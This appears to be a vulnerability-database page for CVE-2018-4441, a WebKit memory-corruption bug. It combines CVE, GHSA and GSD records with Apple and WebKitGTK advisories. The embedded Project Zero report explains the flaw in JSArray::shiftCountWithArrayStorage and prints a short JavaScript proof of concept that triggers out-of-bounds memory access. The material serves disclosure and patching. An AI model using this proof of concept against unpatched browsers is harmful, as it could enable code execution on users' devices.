Action not permitted
Modal body text goes here.
cve-2018-4441
Vulnerability from cvelistv5
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | iOS, tvOS, watchOS, Safari, iTunes for Windows, iCloud for Windows |
Version: Versions prior to: iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T05:18:25.521Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209343" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209342" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209340" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209344" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209346" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT209345" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "iOS, tvOS, watchOS, Safari, iTunes for Windows, iCloud for Windows", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Versions prior to: iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9." } ], "problemTypes": [ { "descriptions": [ { "description": "Processing maliciously crafted web content may lead to arbitrary code execution", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-04-03T17:43:19", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209343" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209342" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209340" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209344" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209346" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT209345" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2018-4441", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "iOS, tvOS, watchOS, Safari, iTunes for Windows, iCloud for Windows", "version": { "version_data": [ { "version_value": "Versions prior to: iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Processing maliciously crafted web content may lead to arbitrary code execution" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/kb/HT209343", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209343" }, { "name": "https://support.apple.com/kb/HT209342", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209342" }, { "name": "https://support.apple.com/kb/HT209340", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209340" }, { "name": "https://support.apple.com/kb/HT209344", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209344" }, { "name": "https://support.apple.com/kb/HT209346", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209346" }, { "name": "https://support.apple.com/kb/HT209345", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209345" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2018-4441", "datePublished": "2019-04-03T17:43:19", "dateReserved": "2018-01-02T00:00:00", "dateUpdated": "2024-08-05T05:18:25.521Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2018-4441\",\"sourceIdentifier\":\"product-security@apple.com\",\"published\":\"2019-04-03T18:29:16.283\",\"lastModified\":\"2024-11-21T04:07:24.980\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.\"},{\"lang\":\"es\",\"value\":\"Un problema de corrupci\u00f3n de memoria se abord\u00f3 con una gesti\u00f3n de memoria mejorada. El problema afectaba a iOS en versiones anteriores a la 12.1.1, tvOS en versiones anteriores a la 12.1.1, watchOS en versiones anteriores a la 5.1.2, Safari en versiones anteriores a la 12.0.2, iTunes para Windows en versiones anteriores a la 12.9.2 y iCloud para Windows en versiones anteriores a la 7.9.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:P/I:P/A:P\",\"baseScore\":6.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.0.2\",\"matchCriteriaId\":\"822584EE-77D0-4DDC-B524-A6D3D63184D5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.1.1\",\"matchCriteriaId\":\"A79B50D1-F20E-4A84-B75F-D28519FD8266\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.1.1\",\"matchCriteriaId\":\"4CB972B5-9DB6-431D-90C6-081FD1751676\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.1.2\",\"matchCriteriaId\":\"06F7BB21-66D5-4AD6-83B8-66CC8E7656AD\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:icloud:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"7.9\",\"matchCriteriaId\":\"9E9BC10A-A085-41FD-B7E4-10DABF6E7B6C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.9.2\",\"matchCriteriaId\":\"F8E149ED-9F45-4532-8AF2-69B91E1331F5\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A2572D17-1DE6-457B-99CC-64AFD54487EA\"}]}]}],\"references\":[{\"url\":\"https://support.apple.com/kb/HT209340\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209342\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209343\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209344\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209345\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209346\",\"source\":\"product-security@apple.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209340\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209342\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209343\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209344\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209345\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://support.apple.com/kb/HT209346\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}" } }
ghsa-8pj8-v43j-qvjx
Vulnerability from github
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.
{ "affected": [], "aliases": [ "CVE-2018-4441" ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2019-04-03T18:29:00Z", "severity": "HIGH" }, "details": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "id": "GHSA-8pj8-v43j-qvjx", "modified": "2022-05-14T01:12:17Z", "published": "2022-05-14T01:12:17Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-4441" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209340" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209342" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209343" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209344" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209345" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT209346" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ] }
gsd-2018-4441
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2018-4441", "description": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "id": "GSD-2018-4441", "references": [ "https://www.suse.com/security/cve/CVE-2018-4441.html", "https://packetstormsecurity.com/files/cve/CVE-2018-4441" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2018-4441" ], "details": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "id": "GSD-2018-4441", "modified": "2023-12-13T01:22:28.181183Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2018-4441", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "iOS, tvOS, watchOS, Safari, iTunes for Windows, iCloud for Windows", "version": { "version_data": [ { "version_value": "Versions prior to: iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Processing maliciously crafted web content may lead to arbitrary code execution" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/kb/HT209343", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209343" }, { "name": "https://support.apple.com/kb/HT209342", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209342" }, { "name": "https://support.apple.com/kb/HT209340", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209340" }, { "name": "https://support.apple.com/kb/HT209344", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209344" }, { "name": "https://support.apple.com/kb/HT209346", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209346" }, { "name": "https://support.apple.com/kb/HT209345", "refsource": "MISC", "url": "https://support.apple.com/kb/HT209345" } ] } }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.1.2", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.9.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apple:icloud:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "7.9", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2018-4441" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-119" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/kb/HT209346", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209346" }, { "name": "https://support.apple.com/kb/HT209345", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209345" }, { "name": "https://support.apple.com/kb/HT209344", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209344" }, { "name": "https://support.apple.com/kb/HT209343", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209343" }, { "name": "https://support.apple.com/kb/HT209342", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209342" }, { "name": "https://support.apple.com/kb/HT209340", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://support.apple.com/kb/HT209340" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9 } }, "lastModifiedDate": "2019-04-05T15:49Z", "publishedDate": "2019-04-03T18:29Z" } } }
var-201904-1323
Vulnerability from variot
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9. WebKit is prone to a memory-corruption vulnerability. A remote attacker can leverage this issue to execute arbitrary code in the context of the user running the application. Failed exploit attempts may result in a denial-of-service condition. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A buffer error vulnerability exists in the WebKit component of several Apple products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. WebKit: JSC: A bug in JSArray::shiftCountWithArrayStorage
CVE-2018-4441
bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { unsigned oldLength = storage->length(); RELEASE_ASSERT(count <= oldLength);
// If the array contains holes or is otherwise in an abnormal state,
// use the generic algorithm in ArrayPrototype.
if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this))
|| hasSparseMap()
|| shouldUseSlowPut(indexingType())) {
return false;
}
if (!oldLength)
return true;
unsigned length = oldLength - count;
storage->m_numValuesInVector -= count;
storage->setLength(length);
Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user.
In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return true, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.
PoC: function main() { let arr = [1];
arr.length = 0x100000;
arr.splice(0, 0x11);
arr.length = 0xfffffff0;
arr.splice(0xfffffff0, 0, 1);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
Found by: lokihardt
. CVE-2018-4438: lokihardt of Google Project Zero
Installation note:
Safari 12.0.2 may be obtained from the Mac App Store. ------------------------------------------------------------------------ WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0009
Date reported : December 13, 2018 Advisory ID : WSA-2018-0009 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0009.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0009.html CVE identifiers : CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464. Processing maliciously crafted web content may lead to arbitrary code execution. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Processing maliciously crafted web content may lead to arbitrary code execution.
We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.
Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.
The WebKitGTK+ and WPE WebKit team, December 13, 2018 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2018-12-05-1 iOS 12.1.1
iOS 12.1.1 is now available and addresses the following:
Airport Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4303: Mohamed Ghannam (@_simo36)
Disk Images Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4465: Pangu Team
FaceTime Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local attacker may be able to view contacts from the lock screen Description: A lock screen issue allowed access to contacts on a locked device. CVE-2018-4430: videosdebarraquito
File Provider Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to learn information about the presence of other applications on the device Description: This issue was addressed with improved entitlements. CVE-2018-4446: Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin CarabaE and RAzvan Deaconescu of University POLITEHNICA of Bucharest
Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed by removing the vulnerable code. CVE-2018-4460: Kevin Backhouse of Semmle Security Research Team
Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2018-4431: An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program
Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved restrictions. CVE-2018-4435: Jann Horn of Google Project Zero, Juwei Lin(@panicaII) and Junzhi Lu of TrendMicro Mobile Security Team
Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2018-4447: Juwei Lin(@panicaII) and Zhengyu Dong of TrendMicro Mobile Security Team
Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4461: Ian Beer of Google Project Zero
LinkPresentation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted email may lead to user interface spoofing Description: A spoofing issue existed in the handling of URLs. CVE-2018-4429: Victor Le Pochat of imec-DistriNet, KU Leuven
Profiles Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An untrusted configuration profile may be incorrectly displayed as verified Description: A certificate validation issue existed in configuration profiles. This was addressed with additional checks. CVE-2018-4436: James Seeley @Code4iOS, Joseph S. of Wyong High School
Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to user interface spoofing Description: A logic issue was addressed with improved validation. CVE-2018-4439: xisigr of Tencent's Xuanwu Lab (tencent.com)
Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: A logic issue was addressed with improved state management. CVE-2018-4440: Wenxu Wu of Tencent Security Xuanwu Lab (xlab.tencent.com)
Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may be unable to fully delete browsing history Description: "Clear History and Website Data" did not clear the history. CVE-2018-4445: William Breuer
WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4441: lokihardt of Google Project Zero CVE-2018-4442: lokihardt of Google Project Zero CVE-2018-4443: lokihardt of Google Project Zero
WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A logic issue existed resulting in memory corruption. CVE-2018-4438: lokihardt of Google Project Zero
WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4437: HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea CVE-2018-4464: HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea
Additional recognition
Profiles We would like to acknowledge Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin CarabaE and RAzvan Deaconescu of University POLITEHNICA of Bucharest for their assistance.
SafariViewController We would like to acknowledge YiAit Can YILMAZ (@yilmazcanyigit) for their assistance.
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "iOS 12.1.1".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlwINzopHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3F1FhAA vJoYbLbK0j4TDxVDWzcyTTNdF/B2vaz3Ljw8WpsYmJaMazHxsvRe3UfqBdbz1hGL 8hYBqdnjh+O9qck61tCWfH3A8f284onjL2XYdJC1NaRHr6pnJNJYU7peaavxbEty sduSMVImtPl8s9LROC0qpldpGWiRlORXUa3HZ7FDoagsy6BWW6J0srFIzylhyqZ4 LxOZ/zWJE7J50dGRA2ixGT42OgeZhVJjJTSazA44pFepfSPYEogt57A3h3sfRHIg 8Yj4rOeK+u92UqA4cTTaUwN+OZgy1HuL33tKFduYQU7IXxpNKoqL+HR0LR+HZ53O lLjOCAaxrEV4kWAMB5zt41JcFJu9fNfoCFG3jc+HQnlXfjP9/IZ/hH5vAQju8TO8 JKs3Om1BdMc+UVm1JhdmxNGB3I1bE5TllyanfU2B7LR/RGXNYbnE0ibEiuTtwX1x hZN6a2MV3dBJajCeLT/t7tMiaHYbJ44KBLIRpnzvzbY2tSLjyWAxA/xpfFBSPCwM mGJo8uWj6KcgiM4rHEgas3FVK/9BRvDj7mpP+tYuMA5wTuJPZOsa2kMiIXcgjaLB ykPlc/1GYrzkK9lRTXfu6y8+J1ngx1QGX5tMv7HyrdvCdp9c5OIOA3G9iVCUwRNr i10Ydh86HYDDPjbsGhNH+CT3fWnoFyYNg7F05Y+4piY= =aFkK -----END PGP SIGNATURE-----
